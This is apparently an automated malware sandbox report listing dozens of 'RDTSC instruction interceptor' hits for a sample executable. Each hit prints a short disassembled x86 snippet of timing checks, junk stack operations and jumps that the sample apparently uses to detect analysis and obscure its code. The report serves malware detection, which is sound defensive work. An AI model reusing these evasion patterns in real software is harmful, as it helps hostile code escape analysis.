                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26904E second address: 269062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F054911993Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269062 second address: 269066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269066 second address: 26906C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26933E second address: 269346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2694DC second address: 2694F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F054911993Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2694F7 second address: 2694FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2694FF second address: 26950F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269AC4 second address: 269AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269AC8 second address: 269ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269ACC second address: 269AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269AD4 second address: 269ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269ADA second address: 269ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269ADE second address: 269AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269DD3 second address: 269DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269DD7 second address: 269DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0549119936h 0x0000000e jmp 00007F054911993Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269DF1 second address: 269DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26B979 second address: 26B97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26B97F second address: 26B994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F05491602DAh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26B994 second address: 26B998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26B998 second address: 26B99C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26CEA0 second address: 26CEA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2753FF second address: 275436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F05491602D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jnl 00007F05491602DEh 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jng 00007F05491602ECh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F05491602DEh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27436C second address: 274370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27A5E1 second address: 27A5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27A5E6 second address: 27A5EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27A5EB second address: 27A615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F05491602E3h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F05491602DEh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jng 00007F05491602D6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 279DE2 second address: 279DE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 279F9D second address: 279FA7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05491602D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27A386 second address: 27A38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 23BB43 second address: 23BB49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 23BB49 second address: 23BB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F054911993Bh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C300 second address: 27C31C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F05491602D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C3BA second address: 27C455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F054911994Ah 0x0000000c jmp 00007F0549119944h 0x00000011 popad 0x00000012 add dword ptr [esp], 2D96D14Fh 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F0549119938h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1CA7h], ecx 0x00000039 call 00007F0549119939h 0x0000003e pushad 0x0000003f pushad 0x00000040 jmp 00007F054911993Fh 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 popad 0x00000048 pushad 0x00000049 push esi 0x0000004a pop esi 0x0000004b push eax 0x0000004c pop eax 0x0000004d popad 0x0000004e popad 0x0000004f push eax 0x00000050 pushad 0x00000051 jmp 00007F054911993Bh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F0549119949h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C455 second address: 27C478 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F05491602E2h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C478 second address: 27C4C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F0549119936h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f pushad 0x00000010 jp 00007F0549119936h 0x00000016 jmp 00007F0549119941h 0x0000001b popad 0x0000001c js 00007F0549119938h 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F0549119942h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C4C1 second address: 27C4C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C733 second address: 27C737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C737 second address: 27C740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C802 second address: 27C817 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F054911993Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C9C2 second address: 27C9CC instructions: 0x00000000 rdtsc 0x00000002 js 00007F05491602DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C9CC second address: 27C9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0549119940h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27CA8A second address: 27CA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27D6D6 second address: 27D6E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27D6E2 second address: 27D70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F05491602E5h 0x0000000a popad 0x0000000b nop 0x0000000c mov esi, dword ptr [ebp+122D3A77h] 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27D70C second address: 27D711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27DC05 second address: 27DC89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a stc 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F05491602D8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push eax 0x00000028 je 00007F05491602DCh 0x0000002e mov edi, dword ptr [ebp+122D3A77h] 0x00000034 pop esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F05491602D8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 je 00007F05491602D6h 0x00000057 mov esi, dword ptr [ebp+122D2BC0h] 0x0000005d xchg eax, ebx 0x0000005e push ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 jns 00007F05491602D6h 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27F706 second address: 27F70A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27F7B1 second address: 27F7B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27F7B7 second address: 27F7BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27F7BD second address: 27F7C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 280280 second address: 280285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 281CBE second address: 281CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 236940 second address: 23694B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 23694B second address: 236953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 282312 second address: 282316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 282BC2 second address: 282BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2869CC second address: 2869D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28901E second address: 289022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 289022 second address: 28902C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 289524 second address: 28952F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F05491602D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28B529 second address: 28B546 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119943h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28B546 second address: 28B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28C511 second address: 28C52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0549119946h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28C52B second address: 28C54E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28C54E second address: 28C552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28B793 second address: 28B79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28B79A second address: 28B79F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28C552 second address: 28C56B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28D6D9 second address: 28D6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28D6DE second address: 28D6F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28E6B2 second address: 28E6B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 290595 second address: 2905AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05491602DEh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 290666 second address: 29066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28F81B second address: 28F820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28F820 second address: 28F827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2945E6 second address: 29462F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b sub edi, 70349985h 0x00000011 push 00000000h 0x00000013 mov bx, di 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F05491602D8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 push eax 0x00000033 pushad 0x00000034 jbe 00007F05491602D8h 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29462F second address: 294633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 294633 second address: 294637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2938A6 second address: 2938AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 292840 second address: 292844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 292844 second address: 29284A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2938AB second address: 2938D0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05491602D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F05491602E4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29284A second address: 292850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2938D0 second address: 2938ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05491602E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 291826 second address: 291830 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 292850 second address: 292854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2947E1 second address: 2947E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 292854 second address: 2928CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bh, 49h 0x0000000d mov di, 46C2h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr [ebp+1246FF8Eh], eax 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F05491602D8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f jnc 00007F05491602D7h 0x00000045 or bh, FFFFFF8Bh 0x00000048 mov eax, dword ptr [ebp+122D0095h] 0x0000004e movzx ebx, bx 0x00000051 push FFFFFFFFh 0x00000053 sbb di, A152h 0x00000058 call 00007F05491602DCh 0x0000005d cld 0x0000005e pop ebx 0x0000005f nop 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 jns 00007F05491602D6h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2928CE second address: 2928F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0549119948h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2928F4 second address: 2928F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29488B second address: 294891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
